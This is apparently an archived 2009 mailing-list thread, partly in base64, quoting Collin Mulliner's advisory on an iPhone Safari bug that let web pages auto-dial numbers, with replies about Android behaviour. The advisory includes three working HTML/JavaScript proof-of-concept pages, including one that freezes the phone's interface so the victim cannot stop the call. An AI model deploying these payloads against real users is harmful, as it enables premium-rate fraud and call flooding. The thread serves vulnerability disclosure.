dGhlciB0aGFuIHRoZSAiY2FuY2VsIiBvcHRpb24uDQo+CQ0KPiAgIFRoaXMgY29uZGl0aW9uIG9j
Y3VycyBpZiBhIFRFTCBVUkkgaXMgYWN0aXZhdGVkIGF0IHRoZSBzYW1lIHRpbWUNCj4gICBTYWZh
cmkgaXMgY2xvc2VkIGJ5IGxhdW5jaGluZyBhbiBleHRlcm5hbCBhcHBsaWNhdGlvbiwgZm9yIGV4
YW1wbGUNCj4gICBsYXVuY2hpbmcgdGhlIFNNUyBhcHBsaWNhdGlvbiAoaW4gb3JkZXIgdG8gaGFu
ZGxlIGEgU01TIFVSSSBbMl0pLiBUaGUNCj4gICBTTVMgYXBwbGljYXRpb24gY2FuIGJlIGxhdW5j
aGVkIHRocm91Z2ggcGxhY2luZyBhIFNNUyBVUkkgYXMgdGhlDQo+ICAgc291cmNlIG9mIGFuIGlm
cmFtZS4gVGhpcyBpcyBzaG93biBpbiB0aGUgZmlyc3QgcHJvb2Ytb2YtY29uY2VwdA0KPiAgIGV4
cGxvaXQgYmVsb3cuDQo+CQ0KPiAgIEZ1cnRoZXIgaW52ZXN0aWdhdGlvbiBzaG93ZWQgdGhhdCB0
aGlzIGJlaGF2aW9yIGNhbiBiZSByZXByb2R1Y2VkIGJ5DQo+ICAgbGF1bmNoaW5nIG90aGVyIGFw
cGxpY2F0aW9ucyBzdWNoIGFzOiBNYXBzLCBZb3VUdWJlLCBhbmQgaVR1bmVzLg0KPiAgIExhdW5j
aGluZyB0aGVzZSBhcHBsaWNhdGlvbnMgY2FuIGJlIGFjaGlldmVkIHRocm91Z2ggbG9hZGluZyBz
cGVjaWFsDQo+ICAgVVJMcyB1c2luZyB0aGUgbWV0YSByZWZyZXNoIHRhZy4gVGhpcyBpcyBzaG93
biBpbiB0aGUgc2Vjb25kDQo+ICAgcHJvb2Ytb2YtY29uY2VwdCBleHBsb2l0IGJlbG93Lg0KPg0K
PiAgIFdlIGFsc28gZGlzY292ZXJlZCB0aGF0IHRoZSBidWcgY2FuIGFsc28gYmUgdHJpZ2dlcmVk
IHRocm91Z2ggcG9wdXANCj4gICB3aW5kb3dzIChlLmcuIGphdmFzY3JpcHQgYWxlcnQpLiBJbiB0
aGlzIHNpdHVhdGlvbiB0aGUgaW5pdGlhdGluZyBhcHANCj4gICBkb2VzIG5vdCBuZWVkIHRvIGJl
IHRlcm1pYW50ZWQgaW4gb3JkZXIgdG8gYWN0aXZlIHRoZSBjYWxsLg0KPgkNCj4gICBGaW5hbGx5
LCB3ZSBkaXNjb3ZlcmVkIGEgc2Vjb25kIGJ1ZyB0aGF0IGNhbiBiZSB1c2VkIHRvIHBlcmZvcm0N
Cj4gICBtYWxpY2lvdXMgcGhvbmUgY2FsbHMgdGhhdCBjYW5ub3QgYmUgcHJldmVudGVkIG9yIGNh
bmNlbGVkIGJ5IHRoZQ0KPiAgIHZpY3RpbS4gVGhpcyBidWcgYWxsb3dzIHRoZSBhdHRhY2tlciB0
byBmcmVleiB0aGUgR1VJIChncmFwaGljYWwgdXNlcg0KPiAgIGludGVyZmFjZSkgZm9yIGEgbnVt
YmVyIG9mIHNlY29uZHMuIFdoaWxlIHRoZSBHVUkgaXMgZnJvemVuIHRoZSBjYWxsDQo+ICAgcHJv
Z3Jlc3NlcyBpbgl0aGUgYmFja2dyb3VuZCBhbmQgY2Fubm90IGJlIHN0b3BwZWQgYnkgdGhlIHZp
Y3RpbSB1c2VyLg0KPiAgIEZyZWV6aW5nIHRoZSBHVUkgaXMgYWNoaWV2ZWQgYnkgcGFzc2luZyBh
ICJ2ZXJ5IGxvbmciIHBob25lIG51bWJlciB0bw0KPiAgIHRoZSBTTVMgYXBwbGljYXRpb24uIFRo
ZSBTTVMgYXBwbGljYXRpb24sIGltbWVkaWF0ZWx5IGFmdGVyIGJlaW5nDQo+ICAgc3RhcnRlZCwg
ZnJlZXplcyB0aGUgaVBob25lIEdVSS4gQWxzbyBzd2l0Y2hpbmcgb2ZmIHRoZSBpUGhvbmUgY2Fu
bm90DQo+ICAgYmUgcGVyZm9ybWVkIGZhc3QgZW5vdWdoIGluIG9yZGVyIHRvIHByZXZlbnQgdGhl
IG1hbGljaW91cyBjYWxsLg0KPgkNCj4NCj4gICBbMV0gaHR0cDovL3d3dy5yZmMtZWRpdG9yLm9y
Zy9yZmMvcmZjMzk2Ni50eHQNCj4gICBbMl0gaHR0cDovL3Rvb2xzLmlldGYub3JnL2h0bWwvZHJh
ZnQtYW50dGktZ3NtLXNtcy11cmwtMDQNCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LQ0KPg0KPkZ1cnRoZXIgRGlzY3Vzc2lvbjoNCj4NCj4gICBUaGUgZGlhbGluZyBkaWFsb2cgaXMg
Y2xlYXJseSBzaG93biB0byB0aGUgdXNlciBhbHNvIHRoZSB1c2VyLCBpbiBtb3N0DQo+ICAgY2Fz
ZXMsIGNhbid0IHByZXNzIGNhbmNlbCBxdWljayBlbm91Z2ggaW4gb3JkZXIgdG8gc3RvcCB0aGUg
aW5pdGlhdGlvbg0KPiAgIG9mIHRoZSBjYWxsLiBPbmNlIHRoZSBleHRlcm5hbCBhcHBsaWNhdGlv
biBpcyBsYXVuY2hlZCwgdGhlIHRlbGVwaG9ueQ0KPiAgIGFwcGxpY2F0aW9uIGlzIHJ1bm5pbmcg
aW4gdGhlIGJhY2tncm91bmQgcGVyZm9ybWluZyB0aGUgY2FsbC4gT25seQ0KPiAgIHRoZSBjYWxs
IGZvcndhcmRpbmcgZGlhbG9nIChjb250YWluaW5nIHRoZSAiZGlzbWlzcyIgYnV0dG9uKSBpbmRp
Y2F0ZXMNCj4gICBhIGNhbGwgYmVpbmcgbWFkZS4NCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLQ0KPg0KPlByb29mLW9mLUNvbmNlcHQgd2l0aCBwbGFpbiBIVE1MIHVzaW5nIHRoZSBT
TVMgYXBwbGljYXRpb246DQo+DQo+ICAgPGh0bWw+DQo+ICAgPGhlYWQ+DQo+ICAgPHRpdGxlPmlQ
aG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsIEV4cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGlu
ZXINCj4gICA8L3RpdGxlPg0KPiAgIDwvaGVhZD4NCj4gICA8Ym9keT4NCj4gICA8aWZyYW1lIHNy
Yz0ic21zOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1lPg0KPiAgIDxp
ZnJhbWUgc3JjPSJ0ZWw6KzE0MDg5NzQ4Mzg4IiBXSURUSD01MCBIRUlHSFQ9MTA+PC9pZnJhbWU+
DQo+ICAgPCEtLSBzZWNvbmQgaWZyYW1lIGlzIHRvIGF0dGFjayBxdWljayB1c2VycyB3aG8gbWFu
YWdlIHRvIGNsb3NlIHRoZQ0KPiAgICAgICAgZmlyc3QgY2FsbC1kaWFsb2cgLy8tLT4NCj4gICA8
aWZyYW1lIHNyYz0idGVsOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1l
Pg0KPiAgIDwvYm9keT4NCj4gICA8L2h0bWw+DQo+DQo+UHJvb2Ytb2YtQ29uY2VwdCB1c2luZyBq
YXZhc2NyaXB0IGFuZCB0aGUgTWFwcyBhcHBsaWNhdGlvbjoNCj4NCj4gICA8aHRtbD4NCj4gICA8
aGVhZD4NCj4gICA8dGl0bGU+aVBob25lIFNhZmFyaSBwaG9uZS1hdXRvLWRpYWwgRXhwbG9pdCBE
ZW1vIGJ5IENvbGxpbiBNdWxsaW5lcg0KPiAgIDwvdGl0bGU+DQo+ICAgPG1ldGEgaHR0cC1lcXVp
dj0icmVmcmVzaCIgY29udGVudD0iMDsNCj4gICBVUkw9aHR0cDovL21hcHMuZ29vZ2xlLmRlL21h
cHM/cT1yaGVpbnN0cmFzc2UrNzUrZGFybXN0YWR0Ij4NCj4gICA8L2hlYWQ+DQo+ICAgPGJvZHk+
DQo+ICAgPHNjcmlwdCBsYW5nPWphdmFzY3JpcHQ+DQo+ICAgZnVuY3Rpb24gYSgpIHsNCj4gICAg
ZG9jdW1lbnQud3JpdGUoIjxpZnJhbWUgc3JjPVwidGVsOisxNDA4OTc0ODM4OFwiIFdJRFRIPTUw
IA0KPkhFSUdIVD0xMD48L2lmcmFtZT4iKTsNCj4gICB9DQo+ICAgc2V0VGltZW91dCgiYSgpIiwg
MTAwKTsNCj4gICA8L3NjcmlwdD4NCj4gICA8L2JvZHk+DQo+ICAgPC9odG1sPg0KPgkNCj5Qcm9v
Zi1vZi1Db25jZXB0IGF0dGFjayB3aGVyZSB0aGUgdmljdGltIHVzZXIgY2Fubm90IHN0b3AgdGhl
IG1hbGljaW91cyANCj5waG9uZSBjYWxsOg0KPg0KPiAgIDxodG1sPg0KPiAgIDxoZWFkPg0KPiAg
IDx0aXRsZT5pUGhvbmUgU2FmYXJpIHBob25lLWF1dG8tZGlhbCBFeHBsb2l0IERlbW8gYnkgQ29s
bGluIE11bGxpbmVyDQo+ICAgPC90aXRsZT4NCj4gICA8L2hlYWQ+DQo+ICAgPGJvZHk+DQo+ICAg
PHNjcmlwdCBsYW5nPWphdmFzY3JpcHQ+DQo+ICAgbCA9ICI8aWZyYW1lIHNyYz1cInNtczoiOw0K
PiAgIGZvciAoaSA9IDA7IGkgPCAxMDAwMDsgaSsrKSB7DQo+ICAgICAgICAgICBsID0gbCArICIz
MzQwOTQ4MDM0Mjk4MjMyIjsNCj4gICB9DQo+ICAgbCA9IGwgKyAiXCIgd2lkdGg9MTAgaGVpZ2h0
PTEwPjwvaWZyYW1lPjxpZnJhbWUNCj4gICBzcmM9XCJ0ZWw6KzE0MDg5NzQ4Mzg4XCIgaGVpZ2h0
PTEwIHdpZHRoPTEwPjwvaWZyYW1lPiI7DQo+ICAgZG9jdW1lbnQud3JpdGUobCk7DQo+ICAgPC9z
Y3JpcHQ+DQo+ICAgPC9ib2R5Pg0KPiAgIDwvaHRtbD4NCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLQ0KPg0KPk1vcmUgRGV0YWlsZWQgSW5mb3JtYXRpb246DQo+DQo+ICBEZW1vIHZp
ZGVvIGF2YWlsYWJsZSBhdDoNCj4gICBodHRwOi8vd3d3Lm11bGxpbmVyLm9yZy9pcGhvbmUvDQo+
DQo+ICBBZHZpc29yaWVzOg0KPiAgIGh0dHA6Ly93d3cubXVsbGluZXIub3JnL3NlY3VyaXR5L2Fk
dmlzb3JpZXMvDQo+DQo+LS0tIEVORCBBRFZJU09SWSAtLS0NCj4NCj4NCj4tLSANCj5Db2xsaW4g
Ui4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+DQo+aW5mby9wZ3A6IGZpbmdlciBj
b2xsaW5AYmV0YXZlcnNpb24ubmV0DQo+SWYgQmlsbCBHYXRlcyBoYWQgYSBuaWNrZWwgZm9yIGV2
ZXJ5IHRpbWUgV2luZG93cyBjcmFzaGVkLi4uIE9oIHdhaXQsIGhlIA0KPmRvZXMhDQo=

------OOQR8OIVASFMLRMIKQ9G04MAIHM98G--



From: Collin Mulliner collin@betaversion.net
Sent: Thu 18. Jun 2009 19:29
Mike,

just getting to the phone dialer is not a bug! That is what the tel: 
protocol is for. All most all mobile phones implement this, every time 
you open a tel: URL you will get to the dialer in some way.

Collin

Mike Ely wrote:
> Confirmed on the T-Mobile G1 email app running OS version 1.5.  Was wondering why my phone stepped on email to dial out when I read this email and then I read the subject line ;)
> 
> FWIW, it didnt actually dial, just loaded the dialer with that number ready.  
> 
> Looks like this is a Webkit bug, not Safari. 
> 
> Collin Mulliner <collin@betaversion.net> wrote:
> 
>> Released since Apple published the iPhone 3.0 security fixes.
>>
>> Vulnerability Report
>>
>> --- BEGIN ADVISORY ---
>>
>> Manufacturer: Apple (www.apple.com)
>> Device:       iPhone 3G (iPhone 1st Gen)
>> Firmware:     2.1 (possible earlier versions)
>> Device Type:  smart phone
>>
>> Subsystems: Safari (and mobile telephony)
>>
>> -----------------------------
>>
>> Short name:
>>   iPhone Safari phone-auto-dial (vulnerability)
>>
>> Vulnerability class:
>>   application logic bug
>>
>> Executive Summary:
>>   A malicious website can initiate a phone call without the need of user
>>   interaction. The destination phone number is chosen by the attacker.
>>
>> Risk: MEDIUM-HIGH
>>   Medium to high risk due to the possibility of financial gain through
>>   this attack by calling of premium rate numbers (e.g. 1-900 in the
>>   U.S.). Denial-of-service against arbitrary phone numbers through
>>   mass-calling. User cannot prevent attack.
>>
>> -----------------------------
>>
>> Reporter: Collin Mulliner <collin[AT]mulliner.org>
>>
>> -----------------------------
>>
>> Affiliation: MUlliNER.ORG / the trifinite group / (Fraunhofer SIT)
>>
>> -----------------------------
>>
>> Time line:
>>
>>   Oct. 20. 2008: Reported vulnerability to vendor.
>>   Oct. 20. 2008: Vendor acknowledges receiving our email.
>>                  Not commenting on the vulnerability itself.
>>   Oct. 27. 2008: Sent update to vendor, also requesting a status report.
>>   Oct. 29. 2008: Reply from vendor acknowledging the vulnerability.
>>   Oct. 30. 2008: Sent additional information.
>>   Nov. 13. 2008: Vender says vulnerability is fixed in upcoming OS
>>                  version.
>>   Nov. 20. 2008: Public disclosure.
>>   Jun. 18. 2009: Full-Disclosure.
>>
>> -----------------------------
>>
>> Fix:
>>
>>   iPhone OS 2.2
>>   iPhone OS 2.2.1
>>   iPhone OS 3.0
>> 	
>> -----------------------------
>>
>> Technical Details:
>>
>>   The Safari version running on the iPhone supports handling the TEL [1]
>>   protocol through launching the telephony/dialer application. This is
>>   done by passing the provided phone number to the telephony
>>   application. Under normal conditions, loading a tel: URI results in a
>>   message box asking the users permission to call the given number. The
>>   user is presented with the simple choice to either press call or
>>   cancel.
>>
>>   A TEL URI can be opened automatically if the TEL URI is used as the
>>   source of an HTML iframe or frame, as the URL of a meta refresh, as
>>   the location of a HTTP 30X redirect, and as the location of the
>>   current or a new window using javascript.
>>
>>   We discovered a security vulnerability that dismisses the "ask for
>>   permission to call" dialog in a way that chooses the "call" option
>>   rather than the "cancel" option.
>> 	
>>   This condition occurs if a TEL URI is activated at the same time
>>   Safari is closed by launching an external application, for example
>>   launching the SMS application (in order to handle a SMS URI [2]). The
>>   SMS application can be launched through placing a SMS URI as the
>>   source of an iframe. This is shown in the first proof-of-concept
>>   exploit below.
>> 	
>>   Further investigation showed that this behavior can be reproduced by
>>   launching other applications such as: Maps, YouTube, and iTunes.
>>   Launching these applications can be achieved through loading special
>>   URLs using the meta refresh tag. This is shown in the second
>>   proof-of-concept exploit below.
>>
>>   We also discovered that the bug can also be triggered through popup
>>   windows (e.g. javascript alert). In this situation the initiating app
>>   does not need to be termianted in order to active the call.
>> 	
>>   Finally, we discovered a second bug that can be used to perform
>>   malicious phone calls that cannot be prevented or canceled by the
>>   victim. This bug allows the attacker to freez the GUI (graphical user
>>   interface) for a number of seconds. While the GUI is frozen the call
>>   progresses in	the background and cannot be stopped by the victim user.
>>   Freezing the GUI is achieved by passing a "very long" phone number to
>>   the SMS application. The SMS application, immediately after being
>>   started, freezes the iPhone GUI. Also switching off the iPhone cannot
>>   be performed fast enough in order to prevent the malicious call.
>> 	
>>
>>   [1] http://www.rfc-editor.org/rfc/rfc3966.txt
>>   [2] http://tools.ietf.org/html/draft-antti-gsm-sms-url-04
>>
>> -----------------------------
>>
>> Further Discussion:
>>
>>   The dialing dialog is clearly shown to the user also the user, in most
>>   cases, cant press cancel quick enough in order to stop the initiation
>>   of the call. Once the external application is launched, the telephony
>>   application is running in the background performing the call. Only
>>   the call forwarding dialog (containing the "dismiss" button) indicates
>>   a call being made.
>>
>> -----------------------------
>>
>> Proof-of-Concept with plain HTML using the SMS application:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   </head>
>>   <body>
>>   <iframe src="sms:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   <!-- second iframe is to attack quick users who manage to close the
>>        first call-dialog //-->
>>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   </body>
>>   </html>
>>
>> Proof-of-Concept using javascript and the Maps application:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   <meta http-equiv="refresh" content="0;
>>   URL=http://maps.google.de/maps?q=rheinstrasse+75+darmstadt">
>>   </head>
>>   <body>
>>   <script lang=javascript>
>>   function a() {
>>    document.write("<iframe src="tel:+14089748388" WIDTH=50 
>> HEIGHT=10></iframe>");
>>   }
>>   setTimeout("a()", 100);
>>   </script>
>>   </body>
>>   </html>
>> 	
>> Proof-of-Concept attack where the victim user cannot stop the malicious 
>> phone call:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   </head>
>>   <body>
>>   <script lang=javascript>
>>   l = "<iframe src="sms:";
>>   for (i = 0; i < 10000; i++) {
>>           l = l + "3340948034298232";
>>   }
>>   l = l + "" width=10 height=10></iframe><iframe
>>   src="tel:+14089748388" height=10 width=10></iframe>";
>>   document.write(l);
>>   </script>
>>   </body>
>>   </html>
>>
>> -----------------------------
>>
>> More Detailed Information:
>>
>>  Demo video available at:
>>   http://www.mulliner.org/iphone/
>>
>>  Advisories:
>>   http://www.mulliner.org/security/advisories/
>>
>> --- END ADVISORY ---
>>
>>
>> -- 
>> Collin R. Mulliner <collin@betaversion.net>
>> info/pgp: finger collin@betaversion.net
>> If Bill Gates had a nickel for every time Windows crashed... Oh wait, he 
>> does!


-- 
Collin R. Mulliner <collin@betaversion.net>
info/pgp: finger collin@betaversion.net
C gives you enough rope to hang yourself. C++ also gives you the tree 
object to tie it to.


From: Mike Ely me@taupehat.com
Sent: Thu 18. Jun 2009 14:07
------OOQ6QVNMQ89GSPKM03TM81BMDDCI85
Content-Type: text/plain;
 charset=utf-8
Content-Transfer-Encoding: base64

UGVyaGFwcyBub3QgZ2V0dGluZyB0byB0aGUgZGlhbGVyLCBidXQgaGF2aW5nIHRoZSBkaWFsZXIg
bGF1bmNoIGF1dG9tYXRpY2FsbHkganVzdCBmcm9tIHZpZXdpbmcgYW4gZW1haWw/CgpDb2xsaW4g
TXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+IHdyb3RlOgoKPk1pa2UsDQo+DQo+anVz
dCBnZXR0aW5nIHRvIHRoZSBwaG9uZSBkaWFsZXIgaXMgbm90IGEgYnVnISBUaGF0IGlzIHdoYXQg
dGhlIHRlbDogDQo+cHJvdG9jb2wgaXMgZm9yLiBBbGwgbW9zdCBhbGwgbW9iaWxlIHBob25lcyBp
bXBsZW1lbnQgdGhpcywgZXZlcnkgdGltZSANCj55b3Ugb3BlbiBhIHRlbDogVVJMIHlvdSB3aWxs
IGdldCB0byB0aGUgZGlhbGVyIGluIHNvbWUgd2F5Lg0KPg0KPkNvbGxpbg0KPg0KPk1pa2UgRWx5
IHdyb3RlOg0KPj4gQ29uZmlybWVkIG9uIHRoZSBULU1vYmlsZSBHMSBlbWFpbCBhcHAgcnVubmlu
ZyBPUyB2ZXJzaW9uIDEuNS4gIFdhcyB3b25kZXJpbmcgd2h5IG15IHBob25lIHN0ZXBwZWQgb24g
ZW1haWwgdG8gZGlhbCBvdXQgd2hlbiBJIHJlYWQgdGhpcyBlbWFpbCBhbmQgdGhlbiBJIHJlYWQg
dGhlIHN1YmplY3QgbGluZSA7KQ0KPj4gDQo+PiBGV0lXLCBpdCBkaWRuJ3QgYWN0dWFsbHkgZGlh
bCwganVzdCBsb2FkZWQgdGhlIGRpYWxlciB3aXRoIHRoYXQgbnVtYmVyIHJlYWR5LiAgDQo+PiAN
Cj4+IExvb2tzIGxpa2UgdGhpcyBpcyBhIFdlYmtpdCBidWcsIG5vdCBTYWZhcmkuIA0KPj4gDQo+
PiBDb2xsaW4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+IHdyb3RlOg0KPj4gDQo+
Pj4gUmVsZWFzZWQgc2luY2UgQXBwbGUgcHVibGlzaGVkIHRoZSBpUGhvbmUgMy4wIHNlY3VyaXR5
IGZpeGVzLg0KPj4+DQo+Pj4gVnVsbmVyYWJpbGl0eSBSZXBvcnQNCj4+Pg0KPj4+IC0tLSBCRUdJ
TiBBRFZJU09SWSAtLS0NCj4+Pg0KPj4+IE1hbnVmYWN0dXJlcjogQXBwbGUgKHd3dy5hcHBsZS5j
b20pDQo+Pj4gRGV2aWNlOiAgICAgICBpUGhvbmUgM0cgKGlQaG9uZSAxc3QgR2VuKQ0KPj4+IEZp
cm13YXJlOiAgICAgMi4xIChwb3NzaWJsZSBlYXJsaWVyIHZlcnNpb25zKQ0KPj4+IERldmljZSBU
eXBlOiAgc21hcnQgcGhvbmUNCj4+Pg0KPj4+IFN1YnN5c3RlbXM6IFNhZmFyaSAoYW5kIG1vYmls
ZSB0ZWxlcGhvbnkpDQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPj4+
DQo+Pj4gU2hvcnQgbmFtZToNCj4+PiAgIGlQaG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsICh2
dWxuZXJhYmlsaXR5KQ0KPj4+DQo+Pj4gVnVsbmVyYWJpbGl0eSBjbGFzczoNCj4+PiAgIGFwcGxp
Y2F0aW9uIGxvZ2ljIGJ1Zw0KPj4+DQo+Pj4gRXhlY3V0aXZlIFN1bW1hcnk6DQo+Pj4gICBBIG1h
bGljaW91cyB3ZWJzaXRlIGNhbiBpbml0aWF0ZSBhIHBob25lIGNhbGwgd2l0aG91dCB0aGUgbmVl
ZCBvZiB1c2VyDQo+Pj4gICBpbnRlcmFjdGlvbi4gVGhlIGRlc3RpbmF0aW9uIHBob25lIG51bWJl
ciBpcyBjaG9zZW4gYnkgdGhlIGF0dGFja2VyLg0KPj4+DQo+Pj4gUmlzazogTUVESVVNLUhJR0gN
Cj4+PiAgIE1lZGl1bSB0byBoaWdoIHJpc2sgZHVlIHRvIHRoZSBwb3NzaWJpbGl0eSBvZiBmaW5h
bmNpYWwgZ2FpbiB0aHJvdWdoDQo+Pj4gICB0aGlzIGF0dGFjayBieSBjYWxsaW5nIG9mIHByZW1p
dW0gcmF0ZSBudW1iZXJzIChlLmcuIDEtOTAwIGluIHRoZQ0KPj4+ICAgVS5TLikuIERlbmlhbC1v
Zi1zZXJ2aWNlIGFnYWluc3QgYXJiaXRyYXJ5IHBob25lIG51bWJlcnMgdGhyb3VnaA0KPj4+ICAg
bWFzcy1jYWxsaW5nLiBVc2VyIGNhbm5vdCBwcmV2ZW50IGF0dGFjay4NCj4+Pg0KPj4+IC0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+Pj4NCj4+PiBSZXBvcnRlcjogQ29sbGluIE11bGxp
bmVyIDxjb2xsaW5bQVRdbXVsbGluZXIub3JnPg0KPj4+DQo+Pj4gLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0NCj4+Pg0KPj4+IEFmZmlsaWF0aW9uOiBNVWxsaU5FUi5PUkcgLyB0aGUgdHJp
ZmluaXRlIGdyb3VwIC8gKEZyYXVuaG9mZXIgU0lUKQ0KPj4+DQo+Pj4gLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0NCj4+Pg0KPj4+IFRpbWUgbGluZToNCj4+Pg0KPj4+ICAgT2N0LiAyMC4g
MjAwODogUmVwb3J0ZWQgdnVsbmVyYWJpbGl0eSB0byB2ZW5kb3IuDQo+Pj4gICBPY3QuIDIwLiAy
MDA4OiBWZW5kb3IgYWNrbm93bGVkZ2VzIHJlY2VpdmluZyBvdXIgZW1haWwuDQo+Pj4gICAgICAg
ICAgICAgICAgICBOb3QgY29tbWVudGluZyBvbiB0aGUgdnVsbmVyYWJpbGl0eSBpdHNlbGYuDQo+
Pj4gICBPY3QuIDI3LiAyMDA4OiBTZW50IHVwZGF0ZSB0byB2ZW5kb3IsIGFsc28gcmVxdWVzdGlu
ZyBhIHN0YXR1cyByZXBvcnQuDQo+Pj4gICBPY3QuIDI5LiAyMDA4OiBSZXBseSBmcm9tIHZlbmRv
ciBhY2tub3dsZWRnaW5nIHRoZSB2dWxuZXJhYmlsaXR5Lg0KPj4+ICAgT2N0LiAzMC4gMjAwODog
U2VudCBhZGRpdGlvbmFsIGluZm9ybWF0aW9uLg0KPj4+ICAgTm92LiAxMy4gMjAwODogVmVuZGVy
IHNheXMgdnVsbmVyYWJpbGl0eSBpcyBmaXhlZCBpbiB1cGNvbWluZyBPUw0KPj4+ICAgICAgICAg
ICAgICAgICAgdmVyc2lvbi4NCj4+PiAgIE5vdi4gMjAuIDIwMDg6IFB1YmxpYyBkaXNjbG9zdXJl
Lg0KPj4+ICAgSnVuLiAxOC4gMjAwOTogRnVsbC1EaXNjbG9zdXJlLg0KPj4+DQo+Pj4gLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4+Pg0KPj4+IEZpeDoNCj4+Pg0KPj4+ICAgaVBob25l
IE9TIDIuMg0KPj4+ICAgaVBob25lIE9TIDIuMi4xDQo+Pj4gICBpUGhvbmUgT1MgMy4wDQo+Pj4g
CQ0KPj4+IC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+Pj4NCj4+PiBUZWNobmljYWwg
RGV0YWlsczoNCj4+Pg0KPj4+ICAgVGhlIFNhZmFyaSB2ZXJzaW9uIHJ1bm5pbmcgb24gdGhlIGlQ
aG9uZSBzdXBwb3J0cyBoYW5kbGluZyB0aGUgVEVMIFsxXQ0KPj4+ICAgcHJvdG9jb2wgdGhyb3Vn
aCBsYXVuY2hpbmcgdGhlIHRlbGVwaG9ueS9kaWFsZXIgYXBwbGljYXRpb24uIFRoaXMgaXMNCj4+
PiAgIGRvbmUgYnkgcGFzc2luZyB0aGUgcHJvdmlkZWQgcGhvbmUgbnVtYmVyIHRvIHRoZSB0ZWxl
cGhvbnkNCj4+PiAgIGFwcGxpY2F0aW9uLiBVbmRlciBub3JtYWwgY29uZGl0aW9ucywgbG9hZGlu
ZyBhIHRlbDogVVJJIHJlc3VsdHMgaW4gYQ0KPj4+ICAgbWVzc2FnZSBib3ggYXNraW5nIHRoZSB1
c2VyJ3MgcGVybWlzc2lvbiB0byBjYWxsIHRoZSBnaXZlbiBudW1iZXIuIFRoZQ0KPj4+ICAgdXNl
ciBpcyBwcmVzZW50ZWQgd2l0aCB0aGUgc2ltcGxlIGNob2ljZSB0byBlaXRoZXIgcHJlc3MgY2Fs
bCBvcg0KPj4+ICAgY2FuY2VsLg0KPj4+DQo+Pj4gICBBIFRFTCBVUkkgY2FuIGJlIG9wZW5lZCBh
dXRvbWF0aWNhbGx5IGlmIHRoZSBURUwgVVJJIGlzIHVzZWQgYXMgdGhlDQo+Pj4gICBzb3VyY2Ug
b2YgYW4gSFRNTCBpZnJhbWUgb3IgZnJhbWUsIGFzIHRoZSBVUkwgb2YgYSBtZXRhIHJlZnJlc2gs
IGFzDQo+Pj4gICB0aGUgbG9jYXRpb24gb2YgYSBIVFRQIDMwWCByZWRpcmVjdCwgYW5kIGFzIHRo
ZSBsb2NhdGlvbiBvZiB0aGUNCj4+PiAgIGN1cnJlbnQgb3IgYSBuZXcgd2luZG93IHVzaW5nIGph
dmFzY3JpcHQuDQo+Pj4NCj4+PiAgIFdlIGRpc2NvdmVyZWQgYSBzZWN1cml0eSB2dWxuZXJhYmls
aXR5IHRoYXQgZGlzbWlzc2VzIHRoZSAiYXNrIGZvcg0KPj4+ICAgcGVybWlzc2lvbiB0byBjYWxs
IiBkaWFsb2cgaW4gYSB3YXkgdGhhdCBjaG9vc2VzIHRoZSAiY2FsbCIgb3B0aW9uDQo+Pj4gICBy
YXRoZXIgdGhhbiB0aGUgImNhbmNlbCIgb3B0aW9uLg0KPj4+IAkNCj4+PiAgIFRoaXMgY29uZGl0
aW9uIG9jY3VycyBpZiBhIFRFTCBVUkkgaXMgYWN0aXZhdGVkIGF0IHRoZSBzYW1lIHRpbWUNCj4+
PiAgIFNhZmFyaSBpcyBjbG9zZWQgYnkgbGF1bmNoaW5nIGFuIGV4dGVybmFsIGFwcGxpY2F0aW9u
LCBmb3IgZXhhbXBsZQ0KPj4+ICAgbGF1bmNoaW5nIHRoZSBTTVMgYXBwbGljYXRpb24gKGluIG9y
ZGVyIHRvIGhhbmRsZSBhIFNNUyBVUkkgWzJdKS4gVGhlDQo+Pj4gICBTTVMgYXBwbGljYXRpb24g
Y2FuIGJlIGxhdW5jaGVkIHRocm91Z2ggcGxhY2luZyBhIFNNUyBVUkkgYXMgdGhlDQo+Pj4gICBz
b3VyY2Ugb2YgYW4gaWZyYW1lLiBUaGlzIGlzIHNob3duIGluIHRoZSBmaXJzdCBwcm9vZi1vZi1j
b25jZXB0DQo+Pj4gICBleHBsb2l0IGJlbG93Lg0KPj4+IAkNCj4+PiAgIEZ1cnRoZXIgaW52ZXN0
aWdhdGlvbiBzaG93ZWQgdGhhdCB0aGlzIGJlaGF2aW9yIGNhbiBiZSByZXByb2R1Y2VkIGJ5DQo+
Pj4gICBsYXVuY2hpbmcgb3RoZXIgYXBwbGljYXRpb25zIHN1Y2ggYXM6IE1hcHMsIFlvdVR1YmUs
IGFuZCBpVHVuZXMuDQo+Pj4gICBMYXVuY2hpbmcgdGhlc2UgYXBwbGljYXRpb25zIGNhbiBiZSBh
